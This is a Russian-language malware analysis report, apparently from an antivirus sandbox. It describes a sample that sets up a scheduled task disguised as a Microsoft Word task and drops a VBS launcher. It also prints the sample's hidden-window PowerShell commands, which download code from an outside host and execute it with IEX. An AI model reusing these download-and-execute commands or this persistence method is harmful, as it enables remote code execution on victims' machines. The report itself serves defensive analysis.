Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoft word schedule
Вредоносные функции
Загружает и запускает на исполнение
- https://abcdhost.com/platform.html?id=510
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\platform.vbs
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\..\Platform.vbs" /c powershell "$i=0;While($D -eq $null -and $i -lt 3){$D=(New-Object Net.WebClient).DownloadString('https://abcdhost.com/platform.html?id=510');If($D.contains('.y1')){I...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell $i=0;While($D -eq $null -and $i -lt 3){$D=(New-Object Net.WebClient).DownloadString('https://abcdhost.com/platform.html?id=510');If($D.contains('.y1')){IEX $D}$i++;Start-Sleep -s ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo Set objShell = WScript.CreateObject("WScript.Shell"): iNumberOfArguments = WScript.Arguments.Count: counter = 0: While counter ^< iNumberOfArguments: args = args + " " + WScript.Argumen...
- '<SYSTEM32>\taskeng.exe' {40B30BF3-7F68-44F1-B497-C41E292FCB1B} S-1-5-21-1960123792-2022915161-3775307078-1001:lgovymayhsf\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%TEMP%\..\Platform.vbs" /c powershell "$i=0;While($D -eq $null -and $i -lt 3){$D=(New-Object Net.WebClient).DownloadString('https://abcdhost.com/platform.html?id=510');If($D.contains('.y1')){I...
- '<SYSTEM32>\cmd.exe' /c powershell $i=0;While($D -eq $null -and $i -lt 3){$D=(New-Object Net.WebClient).DownloadString('https://abcdhost.com/platform.html?id=510');If($D.contains('.y1')){IEX $D}$i++;Start-Sleep -s ...
